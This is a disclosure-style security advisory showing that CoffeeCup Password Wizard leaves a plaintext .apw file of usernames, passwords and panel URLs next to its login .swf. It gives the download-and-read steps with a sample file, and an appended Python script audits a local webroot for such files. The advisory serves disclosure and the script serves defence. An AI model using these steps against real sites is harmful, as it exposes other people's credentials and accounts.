+ Topic: Easy obtaining User+Pass+More on CoffeeCup Password Wizard All
Versions
+ Product: CoffeeCup Password Wizard All Versions
+ Vendor: CoffeeCup Software, Inc.
+ Site: http://www.coffeecup.com/java-password/
+ About CoffeeCup Password Wizard: Create unlimited password protected pages
with unlimited usernames and passwords with CoffeeCup Password Wizard.
You don't even have to know Flash, Java, or HTML ! Customize the look and
feel to match your page. You can even point different users to different
URLs ! Preview within the program or your favorite browser. It's all that
easy ! All this and more make CoffeeCup Password Wizard the easiest way
to password protect your pages ! (¿?)
+ Description: User names, passwords and the direct-access URL to each
user's preferences can be easily obtained.
+ Exploit:
Go to the login panel and view the HTML source code to find the location
of the .swf file used for the login.
Example:
Go to
https://www.victim.com/billing/
View the source code:
[...]
ID=billing WIDTH=146 HEIGHT=125>
<PARAM NAME=movie VALUE="billing.swf">
<PARAM NAME=quality VALUE=high>
[...]
(https://www.victim.com/billing/billing.swf)
The password file has the same name as the login file, but with
the extension .apw
Now go to and download the file:
https://www.victim.com/billing/billing.apw (APW is the CoffeeCup Password
Wizard file)
Finally, open this file with any text editor and you will find all the
users with their passwords and the URL of direct access to their options.
Example of a password file:
--------- billing.apw -----------
COFFEECUP PASSWORD WIZARD FILE
WWW.COFFEECUP.COM
PLEASE DO NOT EDIT!!!!
MOVIE WIDTH:120
MOVIE HEIGHT:100
MOVIE FRAME RATE:0
MOVIE BK COLOR:$00ECECEC
MOVIE DEFAULT URL:
MOVIE DEFAULT FRAME:
MOVIE SWF NAME:billing.swf
MOVIE SWF PATH:C:\Documents and Settings\vhost\Mis documentos\Mis Webs\victim.com\new website project\billing
MOVIE FONT NAME:MS Sans Serif
MOVIE FONT SIZE:8
MOVIE FONT COLOR:clBlack
MOVIE TRANSPARENT TRUE
MOVIE VERTICAL TRUE
USER BOX LEFT:2
USER BOX TOP:1
USER BOX WIDTH:116
USER BOX HEIGHT:34
USER BOX CAPTION:Username
PASS BOX LEFT:2
PASS BOX TOP:36
PASS BOX WIDTH:116
PASS BOX HEIGHT:34
PASS BOX CAPTION:Password
BUTTON LEFT:15
BUTTON TOP:78
BUTTON WIDTH:90
BUTTON HEIGHT:20
BUTTON PATH:
BUTTON TX:1
BUTTON TY:1
ADD USER:0anyweb xnet0305 https://www.victim.com/billing/anyweb0001.htm
ADD USER:0anysite xnet2904 https://www.victim.com/billing/anysite0002.htm
[...]
END
--------- billing.apw -----------
Example of user & pass on billing:
user: anyweb
pass: xnet0305
url option panel: https://www.victim.com/billing/anyweb0001.htm
----------------------------------------------------------------
[EOF]
-----------------------------------------------
Credits: ToOcOoL (http://www.valenciahack.com/)
-----------------------------------------------
--------------------------------
Note: sorry for my bad English ;)
--------------------------------
--
XyBØrG
WebMaster of:
www.RZWEB.com.ar
Powered By Dattatec.Com
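
For site owners, an added example (not part of the original advisory and not CoffeeCup code) that audits a local document root for Password Wizard .apw files like the one shown above and lists the accounts whose passwords need changing. The names parse_apw and audit_webroot, the constructed sample file, and the treatment of the leading character in ADD USER entries are assumptions made for the illustration.

```python
import os
import tempfile

APW_MAGIC = "COFFEECUP PASSWORD WIZARD FILE"  # first line of the sample file on this page

def parse_apw(text):
    """Return (swf_name, usernames) for a Password Wizard file, or None if it is not one."""
    lines = text.splitlines()
    if not lines or lines[0].strip() != APW_MAGIC:
        return None
    swf_name, usernames = None, []
    for line in lines[1:]:
        if line.startswith("MOVIE SWF NAME:"):
            swf_name = line.split(":", 1)[1].strip()
        elif line.startswith("ADD USER:"):
            fields = line[len("ADD USER:"):].split()
            # Page sample: "0anyweb" is user "anyweb", so drop the first character
            # (assumed to be a flag). Passwords are never kept.
            if fields and len(fields[0]) > 1:
                usernames.append(fields[0][1:])
    return swf_name, usernames

def audit_webroot(root):
    """List .apw files under a local document root; beside_swf marks the layout described above."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in sorted(f for f in files if f.lower().endswith(".apw")):
            path = os.path.join(dirpath, name)
            with open(path, encoding="latin-1") as fh:
                parsed = parse_apw(fh.read())
            if parsed is None:
                continue  # unrelated file that happens to use the extension
            swf_name, usernames = parsed
            findings.append({
                "path": os.path.relpath(path, root),
                "beside_swf": bool(swf_name) and os.path.isfile(os.path.join(dirpath, swf_name)),
                "rotate": usernames,
            })
    return findings

# Constructed sample input (placeholder account, not taken from any real site)
SAMPLE_APW = ("COFFEECUP PASSWORD WIZARD FILE\nMOVIE SWF NAME:login.swf\n"
              "ADD USER:0alice placeholder1 https://example.test/a.htm\nEND\n")

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as root:
        for name, data in (("login.swf", ""), ("login.apw", SAMPLE_APW)):
            with open(os.path.join(root, name), "w", encoding="latin-1") as fh:
                fh.write(data)
        print(audit_webroot(root))
```

Any file it reports should be moved out of the document root or blocked at the web server, and the passwords of the listed accounts changed.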